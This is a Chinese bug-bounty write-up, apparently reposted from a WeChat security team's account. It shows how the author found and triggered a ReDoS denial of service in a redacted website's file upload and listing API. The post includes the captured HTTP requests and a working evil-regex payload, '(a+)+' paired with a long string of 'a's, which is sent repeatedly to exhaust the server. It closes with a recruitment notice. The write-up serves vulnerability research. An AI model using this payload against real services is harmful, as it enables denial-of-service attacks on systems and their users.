SRC漏洞挖掘之ReDoS漏洞

admin 2024年10月21日23:43:40评论35 views字数 2014阅读6分42秒阅读模式

SRC漏洞挖掘之ReDoS漏洞

CVES实验室

      “CVES实验室”(www.cves.io)由团队旗下SRC组与渗透组合并而成,专注于漏洞挖掘、渗透测试与情报分析等方向。近年来我们报送漏洞总数已达八万余个,其中包含多个部级单位、多个通信运营商、Apache、Nginx、Thinkphp等,获得CNVD证书、CVE编号数百个,在不同规模的攻防演练活动中获奖无数,协助有关部门破获多起省督级别的案件。

ReDos漏洞

登录:

SRC漏洞挖掘之ReDoS漏洞

文件处功能点大概是这样:

SRC漏洞挖掘之ReDoS漏洞

点击上传本地文件,抓包:

POST /api/resource/add HTTP/2Host: www.xxx.comCookie: xxxxxxContent-Length: 202Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"Content-Type: application/json;charset=UTF-8Sec-Ch-Ua-Mobile: ?0Ssox-Ticket: testUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Referer: https://www.xxx.com/{"origin":"click","batch":1685495706167,"url":"xxxx.png","name":"test.png ","size":2244,"file_type":"png","team_id":""}

然后传完文件后会把传过的文件进行列出,数据包:

POST /api/resource/list_with_paging HTTP/2Host: www.xxx.comCookie: xxxxxxContent-Length: 111Content-Type: application/json;charset=UTF-8Sec-Ch-Ua-Mobile: ?0Ssox-Ticket: testUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36{"page_num":1,"page_size":2,"sort_field":"updated_at","sort_order":"desc","file_type":{},"self_uploaded":false}

修改page_size为1就能查看最近上传的文件。

上面那个报错是因为bp插件的sql语句插到了file_type中,看报错信息是正则错误,而且可能与*与/有关,然后就想有什么攻击手段,搜到redos,然后就开始测试正则可以控制不。

SRC漏洞挖掘之ReDoS漏洞

最后发现在最后加上:**,尝试列出文件,成功报错。

SRC漏洞挖掘之ReDoS漏洞

发现现在是这样拼接的正则。

/.(filetype)$/

然后就是fuzz出dos的payload。

{"origin":"click","batch":**********,"url":"xxxxx.txt","name":"test.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaax","size":2244,"file_type":"(a+)+","team_id":""}

然后列出文件,bp发包50次。

{"page_num":"1","page_size":1,"sort_field":"updated_at","sort_order":"desc","file_type":{},"self_uploaded":true}

成功拒绝服务。

SRC漏洞挖掘之ReDoS漏洞

招新事宜

基本要求:

1. 年满18周岁。

2. 踏实肯学,执行力强。

3. 熟悉漏洞复现(1day)思路、熟悉红队作战流程、具备单兵作战能力。

加分项:(满足任意1条即可)

1. 挖过补天专属项目高危漏洞。

2. 知名企业SRC月榜top5。

3. 有高质量CVE编号。

4. Java,Go,Rust,Node.js,PHP等熟悉任意两种及以上代码审计。

联系方式:[email protected]

原文始发于微信公众号(山海之关):SRC漏洞挖掘之ReDoS漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日23:43:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SRC漏洞挖掘之ReDoS漏洞https://cn-sec.com/archives/1946630.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息